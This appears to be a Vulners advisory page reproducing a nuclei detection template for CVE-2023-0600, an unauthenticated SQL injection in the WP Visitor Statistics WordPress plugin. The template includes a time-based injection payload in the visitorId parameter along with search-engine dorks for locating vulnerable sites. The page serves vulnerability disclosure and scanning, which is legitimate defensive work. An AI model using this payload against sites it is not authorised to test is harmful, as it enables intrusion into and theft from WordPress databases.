Lucene search
K

WP Visitor Statistics (Real Time Traffic) < 6.9 - SQL Injection

🗓️ 01 Jul 2026 03:36:47Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 35 Views

WP Visitor Statistics plugin SQL Injection allowing unauthenticated visitors to conduct attacks, fixed in version 6.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2023-0600
15 May 202316:40
circl
CNNVD
WordPress plugin WP Visitor Statistics (Real Time Traffic) SQL注入漏洞
15 May 202300:00
cnnvd
CVE
CVE-2023-0600
15 May 202312:15
cve
Cvelist
CVE-2023-0600 WP Visitor Statistics (Real Time Traffic) < 6.9 - Unauthenticated SQLi
15 May 202312:15
cvelist
NVD
CVE-2023-0600
15 May 202313:15
nvd
OSV
CVE-2023-0600
15 May 202313:15
osv
Patchstack
WordPress WP Visitor Statistics (Real Time Traffic) Plugin < 6.9 is vulnerable to SQL Injection
2 May 202300:00
patchstack
Prion
Sql injection
15 May 202313:15
prion
Positive Technologies
PT-2023-16392 · WordPress · Wp Visitor Statistics
15 May 202300:00
ptsecurity
RedhatCVE
CVE-2023-0600
23 May 202502:56
redhatcve
Rows per page
id: CVE-2023-0600

info:
  name: WP Visitor Statistics (Real Time Traffic) < 6.9 - SQL Injection
  author: r3Y3r53,j4vaovo
  severity: critical
  description: |
    The plugin does not escape user input which is concatenated to an SQL query, allowing unauthenticated visitors to conduct SQL Injection attacks.
  impact: |
    Unauthenticated attackers can execute time-based SQL injection through the visitorId parameter to extract the complete WordPress database including user credentials and site statistics.
  remediation: Fixed in version 6.9
  reference:
    - https://wpscan.com/vulnerability/8f46df4d-cb80-4d66-846f-85faf2ea0ec4
    - https://nvd.nist.gov/vuln/detail/CVE-2023-0600
    - https://github.com/truocphan/VulnBox
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-0600
    cwe-id: CWE-89
    epss-score: 0.04234
    epss-percentile: 0.89776
    cpe: cpe:2.3:a:plugins-market:wp_visitor_statistics:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: plugins-market
    product: wp_visitor_statistics
    framework: wordpress
    shodan-query: http.html:"wp-stats-manager"
    fofa-query: body="wp-stats-manager"
    google-query: inurl:"/wp-content/plugins/wp-stats-manager"
    public-www: /wp-content/plugins/wp-stats-manager/
  tags: time-based-sqli,cve,cve2023,wp,wp-plugin,wordpress,wpscan,unauth,wp-stats-manager,sqli,plugins-market,vkev,vuln
variables:
  str: '{{rand_int(100000, 999999)}}'

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/wp-statistics/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        internal: true
        words:
          - 'Real Time Traffic'

  - raw:
      - |
        @timeout: 30s
        GET /?wmcAction=wmcTrack&siteId=34&url=test&uid=01&pid=02&visitorId={{str}}%27,sleep(6),0,0,0,0,0);--+- HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'status_code == 200'
          - 'contains(body, "sleep(6)")'
        condition: and
# digest: 4a0a0047304502203c54813a97a4cb91d97d636ef69a2e320bbd48306287669c0014b2d72a9901bb0221008da84f87741a105a91380c5f7741cdfad43e0bb25b6c2d173cf95901625de6bc:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.4High risk
Vulners AI Score7.4
CVSS 3.19.8
EPSS0.04234
SSVC
35